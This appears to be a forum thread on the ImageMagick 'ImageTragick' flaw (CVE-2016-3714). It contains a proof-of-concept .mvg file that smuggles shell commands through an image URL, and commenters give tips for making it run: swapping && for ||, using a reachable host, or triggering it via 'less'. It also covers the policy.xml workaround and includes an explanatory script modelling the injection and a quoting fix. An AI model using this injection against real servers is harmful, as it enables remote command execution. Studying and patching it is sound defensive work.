
PoC: save as file.mvg and then run convert file.mvg o.png

    viewbox 0 0 1 1 image over 0,0 0,0 'https://test/" && touch /tmp/hacked && echo "1'




This is what I get on an unpatched staging server. Not sure it did anything...

    $ sudo convert file.mvg o.png
    convert.im6: delegate failed `"curl" -s -k -o "%o" "https:%M"' @ error/delegate.c/InvokeDelegate/1065.
    convert.im6: unable to open image `/tmp/magick-Yjc5q9f1': No such file or directory @ error/blob.c/OpenBlob/2638.
    convert.im6: unable to open file `/tmp/magick-Yjc5q9f1': No such file or directory @ error/constitute.c/ReadImage/583.


If https://test can't be opened by curl then the rest of the commands will fail because they are chained by &&. If you change the first && to || then it will work.


I assumed that "bug" was added intentionally as a script kiddie deterrence...


Can confirm that I was able to reproduce after tweaking some of the special characters in the above PoC.


Works for me (with a slight bugfix to the .mvg) :O

The policy.xml workaround mentioned here seems to stop it https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-3714
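To make the two points raised in the comments above concrete (why the PoC's `&&` chain is a no-op when `https://test` cannot be fetched, and what the policy.xml workaround has to disable), here is an added example. It is not code from the thread or from ImageMagick: it imitates the https delegate template printed in the convert.im6 error (`"curl" -s -k -o "%o" "https:%M"`), assuming `%M` receives the part of the image URL after `https:` and `%o` a temporary file, models sh's `&&`/`||` short-circuiting over the expanded command, and checks a policy.xml for the coder restrictions that the workaround relies on. The quoting in `expand_quoted` and the policy.xml fragments are constructed for illustration and are not the upstream fix.

```python
"""Added example (not from the thread or ImageMagick): expand the https
delegate template the way CVE-2016-3714 abuses it, model which commands
the shell would run, and check a policy.xml for the coder workaround."""
import shlex
import xml.etree.ElementTree as ET

# Delegate template for the https coder, copied from the convert.im6 error
# above. %M is the URL taken from the image, %o the temporary output file.
HTTPS_DELEGATE = '"curl" -s -k -o "%o" "https:%M"'

# URL part of the PoC's `image over` line (assumption: %M is what follows
# "https:"), plus the two variants suggested in the thread.
POC_URL = '//test/" && touch /tmp/hacked && echo "1'
POC_URL_OR = '//test/" || touch /tmp/hacked && echo "1'          # first && -> ||
POC_URL_EXAMPLE = '//example.com/" && touch /tmp/hacked && echo "1'  # reachable host

OUT_PATH = "/tmp/magick-XXXX"  # placeholder for ImageMagick's temp file name


def expand_unsafe(url, template=HTTPS_DELEGATE, out_path=OUT_PATH):
    """Plain substitution (the vulnerable behaviour): a double quote inside
    the URL closes curl's argument and the rest is parsed as more shell."""
    return template.replace("%o", out_path).replace("%M", url)


def expand_quoted(url, template=HTTPS_DELEGATE, out_path=OUT_PATH):
    """Illustrative hardening (assumption, not ImageMagick's actual patch):
    shell-quote each substituted value so the URL stays one argument."""
    return (template.replace('"%o"', shlex.quote(out_path))
                    .replace('"https:%M"', shlex.quote("https:" + url)))


def commands_that_run(shell_cmd, curl_ok):
    """Model sh's && / || short-circuiting over an expanded delegate command.
    curl_ok says whether curl exits 0 (False models the unresolvable host
    'test'); every other command is assumed to succeed.  Returns the argv
    lists that would actually execute, in order."""
    segments, current = [], []
    for tok in shlex.split(shell_cmd):
        if tok in ("&&", "||"):
            segments.append((current, tok))
            current = []
        else:
            current.append(tok)
    segments.append((current, None))

    ran, last_ok, run_next = [], True, True
    for argv, op in segments:
        if run_next:
            ran.append(argv)
            last_ok = curl_ok if argv and argv[0] == "curl" else True
        if op == "&&":
            run_next = last_ok
        elif op == "||":
            run_next = not last_ok
    return ran


# Constructed policy.xml fragment disabling the coders that reach the
# delegates (the shape of the CVE-2016-3714 workaround), and a constructed
# "default" that says nothing about coders.
HARDENED_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
</policymap>"""
DEFAULT_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
</policymap>"""
REQUIRED_DISABLED = {"EPHEMERAL", "URL", "HTTPS", "MVG", "MSL"}


def disabled_coders(policy_xml):
    """Coder patterns that a policy.xml sets to rights="none"."""
    root = ET.fromstring(policy_xml)
    return {p.get("pattern") for p in root.iter("policy")
            if p.get("domain") == "coder" and p.get("rights") == "none"}


def missing_coder_restrictions(policy_xml):
    """Coders from the workaround list that the policy leaves enabled."""
    return REQUIRED_DISABLED - disabled_coders(policy_xml)


if __name__ == "__main__":
    cases = (("PoC as posted, https://test unreachable", POC_URL, False),
             ("first && changed to ||", POC_URL_OR, False),
             ("test replaced by example.com", POC_URL_EXAMPLE, True))
    for label, url, ok in cases:
        cmd = expand_unsafe(url)
        print(f"{label}:\n  {cmd}")
        for argv in commands_that_run(cmd, curl_ok=ok):
            print("  runs:", argv)
    quoted = expand_quoted(POC_URL)
    print("quoted:", quoted, "->", commands_that_run(quoted, curl_ok=False))
    print("default policy still allows:", sorted(missing_coder_restrictions(DEFAULT_POLICY)))
    print("hardened policy still allows:", sorted(missing_coder_restrictions(HARDENED_POLICY)))
```

With the PoC as posted only curl runs, because its non-zero exit stops the `&&` chain; with `||` in the first position curl's failure is what lets `touch /tmp/hacked` run, and with a reachable host all three commands run. In the quoted expansion the whole injected string arrives as one argument to curl, which is the property a delegate fix has to guarantee; disabling the MVG, URL, HTTPS, EPHEMERAL and MSL coders in policy.xml avoids reaching the delegate at all.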


You can trigger the code execution by just using "less" on the mvg file, as it uses ImageMagick if it's installed :)


Replace `test` with `example.com` et voilà.



